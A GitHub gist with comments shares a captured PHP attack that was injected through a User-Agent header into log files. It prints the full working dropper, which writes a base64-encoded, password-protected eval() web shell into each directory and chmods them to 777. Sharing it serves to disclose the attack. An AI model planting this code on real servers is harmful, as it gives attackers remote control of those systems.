Skip to content

Instantly share code, notes, and snippets.

@bortzmeyer

bortzmeyer/gist:4962085

Created February 15, 2013 17:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save bortzmeyer/4962085 to your computer and use it in GitHub Desktop.
Save bortzmeyer/4962085 to your computer and use it in GitHub Desktop.
Download ZIP
PHP attack through log files (code in the User-Agent header)
Raw
gistfile1.php
@ini_set('allow_url_fopen', 1);
addLoader();
$data = @opendir('.');
while ($file = @readdir($data))
{
$file = trim($file);
if (!$file || preg_match('/^\.+$/', $file) || !is_dir($file)) continue;
addLoader($file);
}
@closedir($data);
function addLoader($dir = '')
{
if ($dir) $dir .= '/';
@chmod($dir, 777);
$fp = fopen("{$dir}2716479cdad403d091d623daaf66cd15.php", "w");
fwrite($fp, base64_decode('PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4='));
fclose($fp);
if (file_exists("{$dir}2716479cdad403d091d623daaf66cd15.php"))
{
$ck = "1823649365820354";
print "$ck:{*}:$dir:{*}:";
exit;
}
@bortzmeyer
Copy link
Author

And the second code in the fwrite:

@zvarnell
Copy link

Any idea where this was coming from?

@CorkyMoo
Copy link

Hello,

Messed my logs up.
I missed my logs from a pay site.
Created some with PHP.
In my PHP created logs was a large 64-decode chunk where the UA would have been.
I decoded it twice, a piece of 64-decode within a piece.
I was fairly certain it was an attack of some kind.
There IP was from Romania.
Yours exactly the same as mine.
Please check out go.to/moo. corkymoo.net63.net

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment